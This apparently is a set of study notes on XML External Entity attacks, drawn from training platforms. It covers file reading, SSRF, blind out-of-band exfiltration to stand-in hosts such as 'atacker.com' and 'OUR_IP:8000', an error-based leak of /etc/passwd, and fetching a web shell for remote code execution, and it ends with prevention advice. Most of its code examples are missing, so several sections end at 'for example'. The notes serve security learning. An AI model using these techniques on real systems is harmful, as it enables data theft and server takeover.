XXE - XEE XML External Entity attacks
Sources
- HackTricks.
- Portswigger.
- HackTheBox
Basic concepts
What it XML?
XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data.
What are XML entities?
XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities < and > represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.
What are XML elements?
Element type declarations set the rules for the type and number of elements that may appear in an XML document, what elements may appear inside each other, and what order they must appear in. For example:
What is document type definition?
The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD") or can be loaded from elsewhere (known as an "external DTD") or can be hybrid of the two.
XML Document Type Definition (DTD)
allows the validation of an XML document against a pre-defined document structure. The pre-defined document structure can be defined in the document itself or in an external file.
The following is an example of an XML document:
whereas:
Key | Definition | Example |
---|---|---|
Tag |
The keys of an XML document, usually wrapped with (< /> ) characters. |
<date> |
Entity |
XML variables, usually wrapped with (& /; ) characters. |
< |
Element |
The root element or any of its child elements, and its value is stored in between a start-tag and an end-tag. | <date>01-01-2022</date> |
Attribute |
Optional specifications for any element that are stored in the tags, which may be used by the XML parser. | version="1.0" /encoding="UTF-8" |
Declaration |
Usually the first line of an XML document, and defines the XML version and encoding to use when parsing it. | <?xml version="1.0" encoding="UTF-8"?> |
The DTD for this xml could be:
The above DTD can be placed within the XML document itself, right after the XML Declaration
in the first line. Otherwise, it can be stored in an external file (e.g. email.dtd
), and then referenced within the XML document with the SYSTEM
keyword, as follows:
It is also possible to reference a DTD through a URL, as follows:
How XML custom entities work?
XML allows custom entities (i.e. XML variables) to be defined within the DTD to allow refactoring of variables and reduce repetitive data. This can be done with the use of the ENTITY
keyword, which is followed by the entity name and its value, as follows:
This definition means that any usage of the entity reference &myentity;
(between an ampersand &
and a semi-colon ;
) within the XML document will be replaced with the defined value: "my entity value".
What are XML external entities?
XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared. The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:
The URL can use the file:// protocol, and so external entities can be loaded from file. For example:
Note: We may also use the
PUBLIC
keyword instead ofSYSTEM
for loading external resources, which is used with publicly declared entities and standards, such as a language code (lang="en"
).
Classic XML External Entity
Base-encoded XML External Entity
This trick only works with PHP web applications:
Blind XML External Entity - Out of Band
But why external entities are accepted
This is a snipped of a PHP code that accept extenal DTDs
Allowing external DTDs is done in line:
Main attacks
New Entity test
In this attack I'm going to test if a simple new ENTITY declaration is working:
1. Retrieve files
Modify the submitted XML in two ways:
- Introduce (or edit) a
DOCTYPE
element that defines an external entity containing the path to the file. - Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.
In a windows system, we may use c:/windows/system32/drivers/etc/hosts:
In a Linux server go for
Encoding techniques
This filter return the file base64-encoded to avoid data loss and truncate.
2. Chaining XXE to SSRF attacks
To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value.
You would then make use of the defined entity in a data value within the XML.
See this lab with an example of exploitation
3. Blind XXE vulnerabilities
Sometimes the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.
Blind XXE requires the use of out-of-band techniques, and call the parameter (for example xxe) just after the ENTITY definition. Therefore, XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD.
You don't need to make use of the defined entity in a data value within the XML as the %xxe;
is already calling the entity.
4. Blind XXE with data exfiltration out-of-band (Blind XXE with OOB data exfiltration)
Alternative 1
1. Create a malicious.dtd file:
2. Serve our malicious.dtd from http://atacker.com/malicious.dtd.
3. Submit a payload to the victim via XXE (blind) with a xml parameter entity.
This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline.
Alternative 2: Manual attack
Create a blind.dtd file with the following content and serve it from our kali machine:
Additionally, the file we want to read had the content of XXE_SAMPLE_DATA, then the file parameter would hold its base64 encoded data (WFhFX1NBTVBMRV9EQVRB). When the XML tries to reference the external oob parameter from our machine, it will request http://OUR_IP:8000/?content=WFhFX1NBTVBMRV9EQVRB. Finally, we can create a php script to decode this encoded content under name index.php
and have it in the same location as blind.dtd as we will be serving it:
Now in the request:
The result:
Tip: In addition to storing our base64 encoded data as a parameter to our URL, we may utilize
DNS OOB Exfiltration
by placing the encoded data as a sub-domain for our URL (e.g.ENCODEDTEXT.our.website.com
), and then use a tool liketcpdump
to capture any incoming traffic and decode the sub-domain string to get the data. Granted, this method is more advanced and requires more effort to exfiltrate data through.
Alternative 3: XXEInjector
Clone the tool XXEInjector
Once cloned, we will save our potentially vulnerable request into a file xxe.req
. We will place the word XXEINJECT
as a position locator for the tool:
Now we can run the tool:
And see the logs under the new created Log folder within the tool:
5. Blind XXE to retrieve data via error messages
An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.
- Trigger an XML parsing error message containing the contents of the
/etc/passwd
file using a malicious external DTD as follows:
Invoking the malicious external DTD may result in an error message like the following:
6. Blind XXE by repurposing a local DTD
If a document's DTD uses a hybrid of internal and external DTD declarations, then the internal DTD can redefine entities that are declared in the external DTD. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.
Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.
For example, suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd
, and this DTD file defines an entity called custom_entity
. An attacker can trigger an XML parsing error message containing the contents of the /etc/passwd
file by submitting a hybrid DTD like the following:
7. XInclude attack
In the following scenario, we cannot implement a classic/blind/oob XXE attack because we don't control the entire XML document and so we cannot define the DOCTYPE
element.
We can bypass this client side verification with XInclude. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. We can place an XInclude
attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
For instance:
8. XXE via file upload
In a file upload feature, if the application expects to receive a format like .png
or .jpeg
, then the image processing lib is likely to accept .svg
too.
Our XXE payload could be:
9. Remote Code Execution: PHP + XXE
In addition to reading local files, we may be able to gain code execution over the remote server. We may still be able to execute commands on PHP-based web applications through the PHP://expect filter, though this requires the PHP expect module to be installed and enabled.
The most efficient method to turn XXE into RCE is by fetching a web shell from our server and writing it to the web app, and then we can interact with it to execute commands.
Now we can use the following XML code to execute a curl
command that downloads our web shell into the remote server:
Note: We replaced all spaces in the above XML code with $IFS
, to avoid breaking the XML syntax. Furthermore, many other characters like |
, >
, and {
may break the code, so we should avoid using them.
See https://airman604.medium.com/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7
10. Denial of Service (DOS)
Finally, one common use of XXE attacks is causing a Denial of Service (DOS) to the hosting web server, with the use the following payload:
This payload defines the a0
entity as DOS
, references it in a1
multiple times, references a1
in a2
, and so on until the back-end server's memory runs out due to the self-reference loops. However, this attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference.
11. Advanced Data Exfiltration with CDATA
Alternative 1
We can utilize another method to extract any kind of data (including binary data) for any web application backend.
To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA
tag (e.g. <![CDATA[ FILE_CONTENT ]]>
). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.
One easy way to tackle this issue would be to define a begin
internal entity with <![CDATA[
, an end
internal entity with ]]>
, and then place our external entity file in between, and it should be considered as a CDATA
element, as follows:
It may not work either because sometimes XML prevents joining internal and external entities, so we will have to find a better way to do so.
Alternative 2
To bypass the previous limitation, we can utilize XML Parameter Entities
, a special type of entity that starts with a %
character and can only be used within the DTD: What's unique about parameter entities is that if we reference them from an external source.
So the final attack would be:
In the attacking payload that is uploaded to the target server:
Note: In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop).
12. Error Based XXE
Another situation we may find ourselves in is one where the web application might not write any output, so we cannot control any of the XML input entities to write its content. Let's consider the exercise we have in /error
at the end of this section, in which none of the XML input entities is displayed on the screen.
Because of this, we have no entity that we can control to write the file output. First, let's try to send malformed XML data, and see if the web application displays any errors.
Next, we create a malicious.dtd file in our attacker machine and serve it:
We will do the following request:
Prevention
Avoiding Outdated Components
While other input validation web vulnerabilities are usually prevented through secure coding practices (e.g., XSS, IDOR, SQLi, OS Injection), this is not entirely necessary to prevent XXE vulnerabilities. This is because XML input is usually not handled manually by the web developers but by the built-in XML libraries instead. So, if a web application is vulnerable to XXE, this is very likely due to an outdated XML library that parses the XML data.
- For example, PHP's libxml_disable_entity_loader function is deprecated since it allows a developer to enable external entities in an unsafe manner, which leads to XXE vulnerabilities.
In addition to updating the XML libraries, we should also update any components that parse XML input, such as API libraries like SOAP.
Using Safe XML Configurations
Other than using the latest XML libraries, certain XML configurations for web applications can help reduce the possibility of XXE exploitation. These include:
- Disable referencing custom
Document Type Definitions (DTDs)
- Disable referencing
External XML Entities
- Disable
Parameter Entity
processing - Disable support for
XInclude
- Prevent
Entity Reference Loops
Additionally, we should always disable displaying runtime errors in web servers.
With the various issues and vulnerabilities introduced by XML data, many also recommend using other formats, such as JSON or YAML
.
Finally, using Web Application Firewalls (WAFs) is another layer of protection against XXE exploitation. However, we should never entirely rely on WAFs and leave the back-end vulnerable, as WAFs can always be bypassed.